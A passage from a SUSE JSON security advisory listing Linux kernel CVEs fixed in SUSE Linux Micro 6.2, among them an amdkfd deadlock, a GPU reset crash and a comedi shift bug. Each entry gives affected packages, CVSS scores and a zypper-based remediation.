"url": "https://bugzilla.suse.com/1248209"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38516"
},
{
"cve": "CVE-2025-38520",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38520"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdkfd: Don\u0027t call mmput from MMU notifier callback\n\nIf the process is exiting, the mmput inside mmu notifier callback from\ncompactd or fork or numa balancing could release the last reference\nof mm struct to call exit_mmap and free_pgtable, this triggers deadlock\nwith below backtrace.\n\nThe deadlock will leak kfd process as mmu notifier release is not called\nand cause VRAM leaking.\n\nThe fix is to take mm reference mmget_non_zero when adding prange to the\ndeferred list to pair with mmput in deferred list work.\n\nIf prange split and add into pchild list, the pchild work_item.mm is not\nused, so remove the mm parameter from svm_range_unmap_split and\nsvm_range_add_child.\n\nThe backtrace of hung task:\n\n INFO: task python:348105 blocked for more than 64512 seconds.\n Call Trace:\n __schedule+0x1c3/0x550\n schedule+0x46/0xb0\n rwsem_down_write_slowpath+0x24b/0x4c0\n unlink_anon_vmas+0xb1/0x1c0\n free_pgtables+0xa9/0x130\n exit_mmap+0xbc/0x1a0\n mmput+0x5a/0x140\n svm_range_cpu_invalidate_pagetables+0x2b/0x40 [amdgpu]\n mn_itree_invalidate+0x72/0xc0\n __mmu_notifier_invalidate_range_start+0x48/0x60\n try_to_unmap_one+0x10fa/0x1400\n rmap_walk_anon+0x196/0x460\n try_to_unmap+0xbb/0x210\n migrate_page_unmap+0x54d/0x7e0\n migrate_pages_batch+0x1c3/0xae0\n migrate_pages_sync+0x98/0x240\n migrate_pages+0x25c/0x520\n compact_zone+0x29d/0x590\n compact_zone_order+0xb6/0xf0\n try_to_compact_pages+0xbe/0x220\n __alloc_pages_direct_compact+0x96/0x1a0\n __alloc_pages_slowpath+0x410/0x930\n __alloc_pages_nodemask+0x3a9/0x3e0\n do_huge_pmd_anonymous_page+0xd7/0x3e0\n __handle_mm_fault+0x5e3/0x5f0\n handle_mm_fault+0xf7/0x2e0\n hmm_vma_fault.isra.0+0x4d/0xa0\n walk_pmd_range.isra.0+0xa8/0x310\n walk_pud_range+0x167/0x240\n walk_pgd_range+0x55/0x100\n __walk_page_range+0x87/0x90\n walk_page_range+0xf6/0x160\n hmm_range_fault+0x4f/0x90\n amdgpu_hmm_range_get_pages+0x123/0x230 [amdgpu]\n amdgpu_ttm_tt_get_user_pages+0xb1/0x150 [amdgpu]\n init_user_pages+0xb1/0x2a0 [amdgpu]\n amdgpu_amdkfd_gpuvm_alloc_memory_of_gpu+0x543/0x7d0 [amdgpu]\n kfd_ioctl_alloc_memory_of_gpu+0x24c/0x4e0 [amdgpu]\n kfd_ioctl+0x29d/0x500 [amdgpu]\n\n(cherry picked from commit a29e067bd38946f752b0ef855f3dfff87e77bec7)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38520",
"url": "https://www.suse.com/security/cve/CVE-2025-38520"
},
{
"category": "external",
"summary": "SUSE Bug 1248217 for CVE-2025-38520",
"url": "https://bugzilla.suse.com/1248217"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38520"
},
{
"cve": "CVE-2025-38521",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38521"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/imagination: Fix kernel crash when hard resetting the GPU\n\nThe GPU hard reset sequence calls pm_runtime_force_suspend() and\npm_runtime_force_resume(), which according to their documentation should\nonly be used during system-wide PM transitions to sleep states.\n\nThe main issue though is that depending on some internal runtime PM\nstate as seen by pm_runtime_force_suspend() (whether the usage count is\n\u003c= 1), pm_runtime_force_resume() might not resume the device unless\nneeded. If that happens, the runtime PM resume callback\npvr_power_device_resume() is not called, the GPU clocks are not\nre-enabled, and the kernel crashes on the next attempt to access GPU\nregisters as part of the power-on sequence.\n\nReplace calls to pm_runtime_force_suspend() and\npm_runtime_force_resume() with direct calls to the driver\u0027s runtime PM\ncallbacks, pvr_power_device_suspend() and pvr_power_device_resume(),\nto ensure clocks are re-enabled and avoid the kernel crash.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38521",
"url": "https://www.suse.com/security/cve/CVE-2025-38521"
},
{
"category": "external",
"summary": "SUSE Bug 1248232 for CVE-2025-38521",
"url": "https://bugzilla.suse.com/1248232"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38521"
},
{
"cve": "CVE-2025-38529",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38529"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncomedi: aio_iiro_16: Fix bit shift out of bounds\n\nWhen checking for a supported IRQ number, the following test is used:\n\n\tif ((1 \u003c\u003c it-\u003eoptions[1]) \u0026 0xdcfc) {\n\nHowever, `it-\u003eoptions[i]` is an unchecked `int` value from userspace, so\nthe shift amount could be negative or out of bounds. Fix the test by\nrequiring `it-\u003eoptions[1]` to be within bounds before proceeding with\nthe original test. Valid `it-\u003eoptions[1]` values that select the IRQ\nwill be in the range [1,15]. The value 0 explicitly disables the use of\ninterrupts.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38529",
"url": "https://www.suse.com/security/cve/CVE-2025-38529"
},
{
"category": "external",
"summary": "SUSE Bug 1248196 for CVE-2025-38529",
"url": "https://bugzilla.suse.com/1248196"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
